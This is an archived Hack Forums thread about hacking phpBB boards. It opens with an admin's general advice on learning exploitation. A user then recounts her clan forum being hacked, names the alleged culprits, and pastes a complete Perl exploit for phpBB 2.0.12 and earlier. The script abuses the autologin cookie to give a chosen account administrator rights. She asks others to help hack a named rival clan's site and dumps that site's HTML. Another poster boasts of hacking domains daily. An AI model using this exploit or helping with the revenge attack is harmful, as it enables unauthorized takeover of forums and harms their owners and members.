Hack Forums

Full Version: How to hack phpbb.
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4
Here is a PM I received today. Normally I don't respond to these at all but it was well worded so I did. I am posting this for everyone to read and making it a sticky for now as well.

ANONYMOUS Wrote:Sorry to bother you, Omni - but as an admi I figured you'd be the right person to start with about this. And I wanted to do this privately because of the sensitive nature of the help I need.

I want to learn to hack into phpbb forums. I've seen people say "simple" but from there all I read is a lot of jargon that is beyond me. I'm not dumb, but too much info at once can be very confusing for me, and I end up asking all sorts of questions to temper that confusion so I can understand. That commonly causes angst amongst other people and it ends up getting messy.

My own knowledge of hacking is very VERY basic. As far as programming goes I only really know HTML - and I suspect PHP knowledge will be needed for a PHP forum. Unless there's an executable program going around for this purpose (hacking phpbb forums) and I haven't found one here.

I'm an impatient learner to be honest (that also doesn't help) and actually I feel some private tutoring in PM or maybe even off board may be the way to go with me. I'm not asking you to do the hacking for me (I tried that when I was panicking 24 hours ago over the forum I want to hack because of all the slander that was being meted out there - and the admin's refusal to do anything about it). I want to learn - and I'm hoping there's a simple way to do so.

All I need is a tutor with an exceptional amount of patience.

I hope you understand what I need and why. I would appreciate a quick response if at all possible.

To hack any site you need to understand the sites programming language. However much hacking or attacking is done via another langauage. They could be batch files, windows tools, C code, and various languages that can be run from a shell (scripts basically).

One thing to do is read security advisories from sites like secunia. If you want to practice I suggest you have a local copy of the software and start reading it's code. Even more practice would be trying old versions that are exploitable then practice using known exploits. If you can successfully accomplish that you stand a chance at hacking the site once a security hole is found by someone else. The realistic chances of you finding this hole as a n00b are very slim.

That's the best I can offer. Hacking is the art of troubleshooting. Any hacker has to use trial and error to obtain their results. This goes for white hat and black hat. While there are scripts that work to hack phpbb those are normally reserved for older unpatched versions. Not very useful if the admin updates often.

Thanks for reading.
Omniscient , I must say , It's the first time I think , you ever replied to a PM , anyway your reply was helpful hopefully the sender will understand.
Thanks
I respond to a LOT of PM's. Normally ones well worded that ask a question that's answerable. I get a TON of PM's asking for me to help hack this or help hack that..I just ignore them for the most part. This one caught my eye as it was well worded and my reply would make a good post too.
Hi, I'm new at this, but I had my Clan forum hacked by this perverts and they put homosexual porn in it, and our clan has children under the age of thirteen. I was so angry at this; I contacted the forum company and told them and they pulled it off the internet. Well it was disgusting to say the list”. They also talk very bad about me and they do not even know me personally I’ m 18 year old girl this jerks are saying that I’ am a 40 yr.old pedophile but they have no proof of me doing anything improper. But like the old saying goes, if you tell a lie long enough people will start to believe it. and is all slander in there part it has been going on since I start the BBJA clan in jk 2 with a server this guys are also stalking me they attack me like three or four of them at a time in the game server also when they attacked my forum it was like eight of them I tried banning them from the forum but some who they hacked and took over the forum and banned me. I think they used this in my search to find out who to hacked my forum I found this my be it will help. Like this guy LCNfoulphil he lead the attack on my forum with his girlfriend and others form flaw community what they are is cyber bullies. This guy thinks that he is a real hacker LCN is the name of his clan la Cosa Nostra he thinks that he is a godfather it is based on the Italian mafiain a jk 2 game lol, this is what he wrote in the flaw forum after they destroyed my forum that I spend hours building it for our clan.

http://www.flawclan.com/oldforums/viewto...21809b2e26

This is what I found I have not tryed it yet so I do not know if it work or not. Or if could be hiden in a picture or link.

#!/usr/bin/perl -w

# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this

# by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no © here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...

if (@ARGV < 3)
{
print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl http://www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++
);
exit;
}
use strict;
use LWP::UserAgent;

my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://";
$request .= $host;
$request .= $path;


use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A% 222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
$browser->proxy("http" , "http://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}

my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;

if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; exit();}

print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;

$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
$request,
[
'username' => $user,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ", $response->status_line
unless $response->is_success;

if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
else {print "No user $user found..."; exit(); }
my $uid = $1;
print "Trying to give user:$user admin status...\n";

$response = $browser->post(
$request,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> $uid,
'submit'=> 'Submit'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";

I think this is a batch file.
I think what gets to me is the attacks against me and there gloating after they do it I put the link to that forum so all of you can see how they laugh after destroying my forum.
But I will get what this idiot said about the whole thing the thought it was very funny of course I do not.
This what he said:
LOL I can multi-task. I was spamming BBJA, redecorating their forums, and chatting with people all at the same time :then he put a smile but it is from another forum I'm not going to take this anymoreNonoBlack HatBBJA is the name of my Clan forum that is gone now they look for my forum using gooogle.

http://www.flawclan.com/oldforums/viewto...21809b2e26
Your not one of those J.K.A. idiots are you? -_-
Because I hack their domains on the Daily because they're fucking stupid Glare
No JK 2 sorry if you encountered idiots, but I do encounter them too. like the idiots from Flaw and LCN they are one in the same idiots they help each other to hack into or clans forums to destroy them I joined this forum to learn who to give them payback I hope. I do not play J. k. A only jedi knight OutcastNono not me

plz, go to this forum you will see what they did to my forum is j.k.2.you can also see how is loggedin at the Forum foulphil

http://www.flawclan.com/oldforums/viewto...21809b2e26

This is his forum, http://www.clanlcn.com/lcn-ranks-r13.htm flaw members belong to LCN too maybe you can help me hack his forum thank you.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>|LCN| La Cosa Nostra </title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
<META HTTP-EQUIV="EXPIRES" CONTENT="0">
<META NAME="RESOURCE-TYPE" CONTENT="DOCUMENT">
<META NAME="DISTRIBUTION" CONTENT="GLOBAL">
<META NAME="AUTHOR" CONTENT="|LCN| La Cosa Nostra">
<META NAME="COPYRIGHT" CONTENT="Copyright © by |LCN| La Cosa Nostra">
<META NAME="KEYWORDS" CONTENT="News, news, New, new, Technology, technology, Headlines, headlines, Nuke, nuke, PHP-Nuke, phpnuke, php-nuke, PHP-Nuke Platinum, php-nuke platinum, PHPNuke Platinum, phpnuke platinum, Platinum, platinum, nuke platinum, Nuke Platinum, Platinum Suite, platinum suite, Platinum suite, Geek, geek, Geeks, geeks, Hacker, hacker, Hackers, hackers, Linux, linux, Windows, windows, Software, software, Download, download, Downloads, downloads, Free, FREE, free, Community, community, MP3, mp3, Forum, forum, Forums, forums, Bulletin, bulletin, Board, board, Boards, boards, PHP, php, Survey, survey, Kernel, kernel, Comment, comment, Comments, comments, Portal, portal, ODP, odp, Open, open, Open Source, OpenSource, Opensource, opensource, open source, Free Software, FreeSoftware, Freesoftware, free software, GNU, gnu, GPL, gpl, License, license, Unix, UNIX, *nix, unix, MySQL, mysql, SQL, sql, Database, DataBase, Blogs, blogs, Blog, blog, database, Mandrake, mandrake, Red Hat, RedHat, red hat, Slackware, slackware, SUSE, SuSE, suse, Debian, debian, Gnome, GNOME, gnome, Kde, KDE, kde, Enlightenment, enlightenment, Interactive, interactive, Programming, programming, Extreme, extreme, Game, game, Games, games, Web Site, web site, Weblog, WebLog, weblog, Guru, GURU, guru, Oracle, oracle, db2, DB2, odbc, ODBC, plugin, plugins, Plugin, Plugins">
<META NAME="DESCRIPTION" CONTENT="Honesty, Integrity, Loyalty">
<META NAME="ROBOTS" CONTENT="INDEX, FOLLOW">
<META NAME="REVISIT-AFTER" CONTENT="1 DAYS">
<META NAME="RATING" CONTENT="GENERAL">

<META NAME="GENERATOR" CONTENT="PHP-Nuke Copyright © 2004 by Francisco Burzi. This is free software, and you may redistribute it under the GPL (http://phpnuke.org/files/gpl.txt). PHP-Nuke comes with absolutely no warranty, for details, see the license (http://phpnuke.org/files/gpl.txt). Powered by PHP-Nuke Platinum (http://www.techgfx.com)">
<script language="Javascript" type="text/javascript">
<!--
function img_popup(image_url, image_width, image_height, popup_rand)
{
screenwidth = false;
screenwidth = screen.Width;
if ( !screenwidth )
{
screenwidth = window.outerWidth;
}
screenheight = false;
screenheight = screen.Height;
if ( !screenheight )
{
screenheight = window.outerHeight;
}
if ( screenwidth < image_width || screenheight < image_height || image_width == null || image_height == null )
{
window.open(image_url, 'limit_image_mod_popup_img_' + popup_rand, 'resizable=yes,top=0,left=0,screenX=0,screenY=0,scrollbars=yes', false);
}
else
{
window.open(image_url, 'limit_image_mod_popup_img_' + popup_rand, 'resizable=yes,top=0,left=0,screenX=0,screenY=0,height=' + image_height + ',width=' + image_width, false);
}
}
//-->
</script>
<link rel="alternate" type="application/rss+xml" title="RSS" href="backend.php">
<LINK REL="StyleSheet" HREF="themes/BF2/style/style.css" TYPE="text/css">





</head>

<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"><script language="javascript" src="themes/BF2/hover.js"></script>
<TABLE WIDTH=100% BORDER=0 CELLPADDING=0 CELLSPACING=0> <TR> <TD background="black"> <TD width="20%" background="black"> </TD> <TD HEIGHT=20>

<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="845" HEIGHT="225" id="logo" ALIGN="">
<PARAM NAME=movie VALUE="themes/BF2/images/logo.swf"> <PARAM NAME=quality VALUE=best> <PARAM NAME=wmode VALUE=transparent> <PARAM NAME=bgcolor VALUE=#FFFFFF> <EMBED src="themes/BF2/images/logo.swf" menu=false quality=best wmode=transparent bgcolor=#E1E9F2 WIDTH="800" HEIGHT="225" NAME="nav" ALIGN="" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
</OBJECT>
</TD> <TD width="20%" background="black"> </TD> <TD> </TR></TABLE><table width="100%" cellpadding="0" cellspacing="0" border="0" align="center">
<tr valign="top">
<td width="180" valign="top">
<script type="text/javascript" language="JavaScript">
function sommaire_envoielistbox(page) {
var reg= new RegExp('(_sommaire_targetblank)$','g');
if (reg.test(page)) {
page=page.replace(reg,"");
window.open(page,'','menubar=yes,status=yes, location=yes, scrollbars=yes, resizable=yes');
}else if (page!="select") {
top.location.href=page;
}
}
function sommaire_ouvre_popup(page,nom,option) {
window.open(page,nom,option);
}
</script>
<table width="200" border="0" cellspacing="0" cellpadding="0">

<tr>
<td><table width="200" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<TD background="themes/BF2/images/bt.gif" width=200 height=50><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>

<td height=50 valign=middle align=center><font class=content><b>|LCN| Navigation</b></font></td>
</tr>
</table></td>
</tr>
<tr>
<td background="themes/BF2/images/bm.gif" width=200><table width="100%" border="0" cellspacing="10" cellpadding="0">
<tr>
<td><font class="content">

<!-- Sommaire realise grace au module Sommaire Parametrable v.2.1.1 - ©marcoledingue - marcoledingue .-:@at@:-. free.fr -->
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr height="4" bgcolor=""><td></td></tr>
<tr ><td bgcolor="" ><a href="index.php"><img src="images/sommaire/icon_home.gif" border="0"></a>&nbsp;<a href="index.php"><font class="storytitle"><strong>Home</strong></font></a></td></tr>
<tr><td><hr></td></tr>
<tr height="4" bgcolor=""><td></td></tr>
<tr ><td bgcolor="" ><img src="images/sommaire/favoritos.gif" border="0">&nbsp;<font class="storytitle"><strong>General</strong></font></td></tr>
<tr name="sommaire-1" id="sommaire-1"><td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0"><tr><td width="20" align="right"><img src="images/sommaire/categories/petitrond.gif" border="0"></td><td>&nbsp;<a href="modules.php?name=Topics"><font class="boxcontent">News Topics</font></a></td></tr>
<tr><td width="20" align="right"><img src="images/sommaire/categories/petitrond.gif" border="0"></td><td>&nbsp;<a href="modules.php?name=Recommend_Us"><font class="boxcontent"><strong>Recommend Us</strong></font></a></td></tr>

<tr><td width="20" align="right"><img src="images/sommaire/categories/petitrond.gif" border="0"></td><td>&nbsp;<a href="modules.php?name=Ban_Request"><font class="boxcontent">Request Ban</font></a></td></tr>
<tr><td width="20" align="right"><img src="images/sommaire/categories/petitrond.gif" border="0"></td><td>&nbsp;<a href="modules.php?name=Statistics"><font class="boxcontent">Statistics</font></a></td></tr>
<tr><td width="20" align="right"><img src="images/sommaire/categories/petitrond.gif" border="0"></td><td>&nbsp;<a href="modules.php?name=Top"><font class="boxcontent">Top 10</font></a></td></tr>
<tr><td width="20" align="right"><img src="images/sommaire/categories/petitrond.gif" border="0"></td><td>&nbsp;<a href="modules.php?name=Web_Links"><font class="boxcontent">Web Links</font></a></td></tr>
</table></td></tr><tr height="4" bgcolor=""><td></td></tr><tr><td><hr></td></tr>
<tr height="4" bgcolor=""><td></td></tr>
<tr ><td bgcolor="" ><img src="images/sommaire/icon_community.gif" border="0">&nbsp;<font class="storytitle"><strong>Community</strong></font></td></tr>
<tr name="sommaire-2" id="sommaire-2"><td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0"><tr><td width="20" align="right"><img src="images/sommaire/categories/petitrond.gif" border="0"></td><td>&nbsp;<a href="modules.php?name=Donations"><font class="boxcontent"><strong>Donations</strong></font></a></td></tr>
<tr><td width="20" align="right"><img src="images/sommaire/admin/interdit.gif" title="Access restricted to our members"></td><td>&nbsp;<a href="modules.php?name=Contact"><font class="boxcontent">Contact</font></a></td></tr>

<tr><td width="20" align="right"><img src="images/sommaire/admin/interdit.gif" title="Access restricted to our members"></td><td>&nbsp;<a href="modules.php?name=Downloads"><font class="boxcontent">Downloads</font></a><img src="images/sommaire/admin/new.gif" border=0 title="New content !"></td></tr>
<tr><td width="20" align="right"><img src="images/sommaire/categories/petitrond.gif" border="0"></td><td>&nbsp;<a href="modules.php?name=Forums"><font class="boxcontent">Forums</font></a></td></tr>
<tr><td colspan=2><hr></td></tr>
<tr><td width="20" align="right"><img src="images/sommaire/categories/petitrond.gif" border="0"></td><td>&nbsp;<a href="modules.php?name=Supporters"><font class="boxcontent">Supporters</font></a></td></tr>
<tr><td width="20" align="right"><img src="images/sommaire/categories/petitrond.gif" border="0"></td><td>&nbsp;<a href="modules.php?name=Surveys"><font class="boxcontent">Surveys</font></a></td></tr>
</table></td></tr><tr height="4" bgcolor=""><td></td></tr><tr><td><hr></td></tr>
<tr height="4" bgcolor=""><td></td></tr>
<tr ><td bgcolor="" ><img src="images/sommaire/icon_members.gif" border="0">&nbsp;<font class="storytitle"><strong>Members</strong></font></td></tr>
<tr name="sommaire-3" id="sommaire-3"><td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0"><tr><td width="20" align="right"><img src="images/sommaire/categories/petitrond.gif" border="0"></td><td>&nbsp;<a href="modules.php?name=Your_Account"><font class="boxcontent">Account</font></a></td></tr>

<tr><td width="20" align="right"><img src="images/sommaire/categories/petitrond.gif" border="0"></td><td>&nbsp;<a href="modules.php?name=Members_List"><font class="boxcontent">Members_List</font></a></td></tr>
<tr><td width="20" align="right"><img src="images/sommaire/categories/petitrond.gif" border="0"></td><td>&nbsp;<a href="modules.php?name=Private_Messages"><font class="boxcontent">Private Messages</font></a></td></tr>
</table></td></tr><tr height="4" bgcolor=""><td></td></tr></table></font></td>

</tr>
</table></td>

</tr>
<tr>
<td height="35"><img src="themes/BF2/images/bb.gif" border=0 width=200 height=35></td>

</tr>
</table></td>
</tr>
</table></td>
</tr>
</table>
</td>
</tr>
</table><table width="200" border="0" cellspacing="0" cellpadding="0">
<tr>

<td><table width="200" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<TD background="themes/BF2/images/bt.gif" width=200 height=50><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height=50 valign=middle align=center><font class=content><b>|LCN| Homepage</b></font></td>

</tr>
</table></td>
</tr>
<tr>
<td background="themes/BF2/images/bm.gif" width=200><table width="100%" border="0" cellspacing="10" cellpadding="0">
<tr>
<td><font class="content"><center><!--[if IE]><A HREF="" onClick="this.style.behavior='url(#default#homepage)';this.setHomePage('www.lcnhome.com');"> Make |LCN| La Cosa Nostra your startpage </A><![endif]--></center></font></td>

</tr>

</table></td>

</tr>
<tr>
<td height="35"><img src="themes/BF2/images/bb.gif" border=0 width=200 height=35></td>
</tr>
</table></td>
</tr>
</table></td>

</tr>
</table>
</td>
</tr>
</table><table width="200" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><table width="200" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>

<td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<TD background="themes/BF2/images/bt.gif" width=200 height=50><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height=50 valign=middle align=center><font class=content><b>Survey</b></font></td>
</tr>
</table></td>
</tr>

<tr>
<td background="themes/BF2/images/bm.gif" width=200><table width="100%" border="0" cellspacing="10" cellpadding="0">
<tr>
<td><font class="content"><form action="modules.php?name=Surveys" method="post"><input type="hidden" name="pollID" value="8"><input type="hidden" name="forwarder" value="modules.php?name=Surveys&amp;op=results&amp;pollID=8"><font class="content"><b>Which event will occur first?</b></font><br><br>
<table border="0" width="100%"><tr><td valign="top"><input type="radio" name="voteID" value="1"></td><td width="100%"><font class="content">Chrinor gets a new computer</font></td></tr>
<tr><td valign="top"><input type="radio" name="voteID" value="2"></td><td width="100%"><font class="content">Duke Nukem Forever gets released</font></td></tr>
</table><br><center><font class="content"><input type="submit" value="Vote"></font><br><br><font class="content"><a href="modules.php?name=Surveys&amp;op=results&amp;pollID=8&amp;mode=&amp;order=&amp;thold="><b>Results</b></a><br><a href="modules.php?name=Surveys"><b>Polls</b></a><br><br>Votes <b>14</b>

</font></center></form>

</font></td>

</tr>
</table></td>

</tr>
<tr>
<td height="35"><img src="themes/BF2/images/bb.gif" border=0 width=200 height=35></td>
</tr>

</table></td>
</tr>
</table></td>
</tr>
</table>
</td>
</tr>
</table><table width="200" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><table width="200" border="0" cellspacing="0" cellpadding="0">

<tr>
<td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor=""><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<TD background="themes/BF2/images/bt.gif" width=200 height=50><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height=50 valign=middle align=center><font class=content><b>Global Bans</b></font></td>

</tr>
</table></td>
</tr>
<tr>
<td background="themes/BF2/images/bm.gif" width=200><table width="100%" border="0" cellspacing="10" cellpadding="0">
<tr>
<td><font class="content"><font class="content"><strong><big>&middot;</big></strong><a href="http://www.pbbans.com/mbi.php?action=5&amp;ban_id=70224" target="new">*SOG*-Z.u.k (b44306d8)</a><br>
<strong><big>&middot;</big></strong><a href="http://www.pbbans.com/mbi.php?action=5&amp;ban_id=70219" target="new">Rooter (c3cd1b1c)</a><br>

<strong><big>&middot;</big></strong><a href="http://www.pbbans.com/mbi.php?action=5&amp;ban_id=70213" target="new">juju (04bb4481)</a><br>
<strong><big>&middot;</big></strong><a href="http://www.pbbans.com/mbi.php?action=5&amp;ban_id=70212" target="new">lamk (a6889b0c)</a><br>
<strong><big>&middot;</big></strong><a href="http://www.pbbans.com/mbi.php?action=5&amp;ban_id=70209" target="new">takis (059d6f8a)</a><br>
<strong><big>&middot;</big></strong><a href="http://www.pbbans.com/mbi.php?action=5&amp;ban_id=70206" target="new">-|ZA|-assassins (a2036b50)</a><br>
<strong><big>&middot;</big></strong><a href="http://www.pbbans.com/mbi.php?action=5&amp;ban_id=70200" target="new">Didier (4d8ed138)</a><br>
<strong><big>&middot;</big></strong><a href="http://www.pbbans.com/mbi.php?action=5&amp;ban_id=70199" target="new">N1ghtw@lker (5d648f00)</a><br>
<strong><big>&middot;</big></strong><a href="http://www.pbbans.com/mbi.php?action=5&amp;ban_id=70198" target="new">ShKaNeTHEIII (1765ac66)</a><br>
<strong><big>&middot;</big></strong><a href="http://www.pbbans.com/mbi.php?action=5&amp;ban_id=70187" target="new">Ryan (eea244bb)</a><br>
<br><a href="http://www.pbbans.com" target="blank"><b>read more...</b></a></font></font></td>

</tr>
</table></td>

</tr>
<tr>
<td height="35"><img src="themes/BF2/images/bb.gif" border=0 width=200 height=35></td>
</tr>
</table></td>
</tr>

</table></td>
</tr>
</table>
</td>
</tr>
</table></td>
<td width="5" valign="top"><img src="themes/BF2/images/spacer.gif" width="5" height="0" border="0"></td>
<td width="100%">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><img name="tlc" src="themes/BF2/images/tlc.gif" width="57" height="51"border="0" alt=""></td>
<td width="100%" background="themes/BF2/images/tm.gif"><img name="tm" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>

<td><img name="trc" src="themes/BF2/images/trc.gif" width="57" height="51" border="0" alt=""></td>
</tr>
<tr>
<td background="themes/BF2/images/tleft.gif"><img name="tleft" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
<td valign="top" bgcolor="#000000">
<center><font class="option" color="#FFFFFF"><b>Welcome to LCN - La Cosa Nostra</b></font></center><br>
<font class="content">La Cosa Nostra, literally translated into English, means "this thing of ours". LCN has been around since 2002 and is comprised of a diverse group from around the World. We pride ourselves in our integrity and honesty and return the respect afforded to us in all areas of the Various Games we Play.<br><br><img src="../images/utwall.gif" align="right">
You may register to become a member to use the Forums and the Chat area, however that does not constitute membership in LCN. <br><br>

Please read the instructions in the General Information section for the expected code of conduct. Please conduct yourself in a respectful and professional manner at all times.</font> </td>
<td background="themes/BF2/images/tright.gif"><img name="tright" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td><img name="blc" src="themes/BF2/images/blc.gif" width="57" height="21" border="0" alt=""></td>
<td background="themes/BF2/images/btm.gif"><img name="btm" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
<td><img name="brc" src="themes/BF2/images/brc.gif" width="57" height="21" border="0" alt=""></td>
</tr></table>

<br><table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><img name="tlc" src="themes/BF2/images/tlc.gif" width="57" height="51"border="0" alt=""></td>
<td width="100%" background="themes/BF2/images/tm.gif"><img name="tm" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
<td><img name="trc" src="themes/BF2/images/trc.gif" width="57" height="51" border="0" alt=""></td>
</tr>
<tr>
<td background="themes/BF2/images/tleft.gif"><img name="tleft" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
<td valign="top" bgcolor="#000000">
<center><font class="option" color="#FFFFFF"><b>Syndicate Servers</b></font></center><br>

<font class="content"><center>
<a href="http://www.lcnhome.com/modules.php?name=cod4stats"><font color=yellow><b>COD4 SERVER STATS CLICK HERE</b></font></a><br>
<a href="
http://www.lcnhome.com/modules.php?name=...oad&cid=12"><font color=yellow><b>CUSTOM MAPS INSTALLER CLICK HERE</b></font></a> <br><br>
<a href="http://lcnhome.com/ultrastats/index.php?serverid=1" target="_blank">
<img src="http://cache.www.gametracker.com/server_info/74.2.59.109:28960/b_560x95.png" border="0" />
</a>
<br>
<a href="http://www.gametracker.com/server_info/64.34.185.253:28960/" target="_blank">
<img src="http://cache.www.gametracker.com/server_info/64.34.185.253:28960/b_560x95.png" border="0" />
</a>
<br>
<a href="http://lcnhome.com/ultrastats/index.php?serverid=3" target="_blank">
<img src="http://cache.www.gametracker.com/server_info/74.2.59.109:28963/b_560x95.png" border="0" />
</a>

<br>
<a href="http://www.gametracker.com/server_info/72.5.248.176:28961/" target="_blank">
<img src="http://cache.www.gametracker.com/server_info/72.5.248.176:28961/b_560x95.png" border="0" />
</a></font> </td>
<td background="themes/BF2/images/tright.gif"><img name="tright" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td><img name="blc" src="themes/BF2/images/blc.gif" width="57" height="21" border="0" alt=""></td>
<td background="themes/BF2/images/btm.gif"><img name="btm" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
<td><img name="brc" src="themes/BF2/images/brc.gif" width="57" height="21" border="0" alt=""></td>

</tr></table>
<br>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><img name="tlc" src="themes/BF2/images/tlc.gif" width="57" height="51"border="0" alt=""></td>
<td width="100%" background="themes/BF2/images/tm.gif"><img name="tm" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>
<td><img name="trc" src="themes/BF2/images/trc.gif" width="57" height="51" border="0" alt=""></td>
</tr>
<tr>
<td background="themes/BF2/images/tleft.gif"><img name="tleft" src="themes/BF2/images/spacer.gif" width="1" height="1" border="0" alt=""></td>

<td valign="top" bgcolor="#000000">
<center><font class="option"><b>|LCN| Forum Postings</b></font></center><br><MARQUEE behavior= "scroll" align= "center" direction= "up" height="220" scrollamount= "2" scrolldelay= "25" onmouseover='this.stop()' onmouseout='this.start()'><table width="100%" border="0" cellspacing="0" cellpadding="1">
<tr>
<td><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td bgcolor="#000000"><table width="100%" border="0" cellpadding="1" cellspacing="1" class="forumline">
<tr>
<th height="25" colspan="2" align="center" nowrap class="thcornerl"><font color="#8E8E8E"><strong>Forum/Topic</strong></font></th>

<th width="50" align="center" nowrap class="thtop"><font color="#8E8E8E"><strong>&nbsp;Replies&nbsp;</strong></font></th>
<th width="100" align="center" nowrap class="thtop"><font color="#8E8E8E"><strong>&nbsp;Author&nbsp;</strong></font></th>
<th width="50" align="center" nowrap class="thtop"><font color="#8E8E8E"><strong>&nbsp;Views&nbsp;</strong></font></th>
<th align="center" nowrap class="thcornerr"><font color="#8E8E8E"><strong>&nbsp;Last Post&nbsp;</strong></font></th>
</tr> <tr>
<td align="center" height="30" width="35" nowrap class="row1"><img src="themes/fiblack3d/forums/images/folder_new.gif" border="0" /></td>

<td width="100%" class="row1">&nbsp;<b>COD 4</b><br>&nbsp;&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12612#12612">Tournament pple?</a></td>
<td align="center" class="row2">4</td>
<td align="center" class="row3"><a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=2">LCN_Hagii</a></td>
<td align="center" class="row2">29</td>
<td align="center" nowrap class="row3"><font size="-2"><i>&nbsp;&nbsp;May 14, 2008 at 09:55:20&nbsp;</i></font><br>
<a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=2">LCN_Hagii</a>&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12612#12612"><img src="themes/fiblack3d/forums/images/icon_minipost_new.gif" border="0" alt="Last Post"></a></td>

</tr> <tr>
<td align="center" height="30" width="35" nowrap class="row1"><img src="themes/fiblack3d/forums/images/folder_new.gif" border="0" /></td>
<td width="100%" class="row1">&nbsp;<b>Et Al</b><br>&nbsp;&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12611#12611">GRID (XBOX 360/PS3/PC)</a></td>
<td align="center" class="row2">4</td>
<td align="center" class="row3"><a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=119">Eaglestrike</a></td>
<td align="center" class="row2">29</td>

<td align="center" nowrap class="row3"><font size="-2"><i>&nbsp;&nbsp;May 13, 2008 at 16:08:57&nbsp;</i></font><br>
<a href="modules.php?name=Forums&file=profile&mode=viewprofile&u=5">LCN_JimmyCarter</a>&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12611#12611"><img src="themes/fiblack3d/forums/images/icon_minipost_new.gif" border="0" alt="Last Post"></a></td>
</tr> <tr>
<td align="center" height="30" width="35" nowrap class="row1"><img src="themes/fiblack3d/forums/images/folder_new.gif" border="0" /></td>
<td width="100%" class="row1">&nbsp;<b>Et Al</b><br>&nbsp;&nbsp;<a href="modules.php?name=Forums&file=viewtopic&p=12608#12608">Game Deals</a></td>
<td align="center" class="row2">3</td>

